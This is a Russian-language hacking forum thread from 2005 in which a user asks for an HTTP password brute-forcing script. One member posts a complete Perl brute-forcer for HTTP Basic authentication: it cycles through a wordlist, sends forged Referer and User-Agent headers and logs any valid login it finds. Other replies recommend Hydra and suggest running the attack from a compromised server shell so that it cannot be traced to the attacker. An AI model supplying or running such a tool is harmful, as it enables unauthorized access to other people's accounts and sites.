Подбор паролей к Xxx

Discussion in 'PHP' started by dim_ok, 7 May 2005.

  1. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    Кто нибудь знает где можно достать скрипт для подбора паролей по http на PHP или Perl'e. Заранее благодарен!
     
    #1 dim_ok, 7 May 2005
    Last edited: 12 Nov 2005
  2. Kr@b!

    Kr@b! New Member

    Joined:
    7 May 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Задай вопрос на securitylab.ru, там подскажут, только все указывай конкретно и выкладывай как можно больше информации об объекте!!!
     
  3. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    а чем те Hydra не нравится???лучший брутфорс.ищи через поисковик....
     
  4. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    Со своего компа брутить - это не дело.
     
  5. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    необязательно со своего компа можно и с шелла)
    вот скриптик на перле
    Code:
    #!/usr/bin/perl
    
    use MIME::Base64;
    use IO::Socket;
    
      if(@ARGV < 5)
      {
          print q(
          .:: Skides DiGiTaL Security ::.
          ------------------------------------
          HTTP-Basic brutforce by rav3n!
          Usage: SHTTP.pl [HOST] [PORT] [DIR] [USER] [DIC]
          );
    
          exit 0;
      }
    
      $server = $ARGV[0];
      $port   = $ARGV[1];
      $dir    = $ARGV[2];
      $user   = $ARGV[3];
      $words  = $ARGV[4];
    
      $foundpass  = "success.log";
      $nowcheck   = "now.log";
    
        open(FILE, "$words") || die print "$!\n";
    
        while($pass = <FILE>)
        {
          $i++;
          chomp($pass);
          
          open(NOW,">$nowcheck") || die print "$!\n";
          print NOW "now $user:$pass -> check $i item\n";
          close NOW;
    
          $access = encode_base64("$user\:$pass");
          chomp($access);
    
          $socket=IO::Socket::INET->new(
                                          PeerAddr => $server,
                                          PeerPort => $port,
                                          Photo => tcp
                                        )                                    
                                        
          || die print "Unable to connect to $server:$port\n";
    
          print $socket "GET $dir HTTP/1.1\n";
          print $socket "Host: $server\n";
          print $socket "Accept: */*\n";
          print $socket "Referer: http://microsoft.com/\n";
          print $socket "User-Agent: Internet Explorer 6.0\n";
          print $socket "Pragma: no-cache\n";
          print $socket "Cache-Control: no-cache\n";
          print $socket "Authorization: Basic $access\n";
          print $socket "Connection: close\n\n";
    
          while(<$socket>)
          {
              if(/(HTTP\/1\.[0-1]\s200\sOK)/)
              {
                open(FILE,">$foundpass") || die print "$!\n";
                print FILE "SUCCESS!!! valid $user:$pass";
                close FILE;
                unlink($nowcheck);
                exit 0;
              }
    
          }
          
         close $socket;
      }
    
     
  6. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    ща попробуем перловый.
     
  7. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    перенесено в PHP,Perl,MySQL
    так как к халяве никакого отношения не имеет и название XXX тут не причем
     
  8. t4k

    t4k New Member

    Joined:
    6 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Блин, а я то подумал что порнушку нахаляву дадут посмотреть... :d
    Ну да ладно, скажу только что брутфорс на перле или пхп это не дело, ты быстрее с того-же самого диалапа гидрой пароль подберёшь или через шелл на серваке, тем более что на многих хостах стоит ограничение на время выполнения скриптов.
     
  9. dim_ok

    dim_ok Elder - Старейшина

    Joined:
    26 Mar 2005
    Messages:
    173
    Likes Received:
    64
    Reputations:
    47
    Так я и не куда не тороплюсь :)
     
    2 people like this.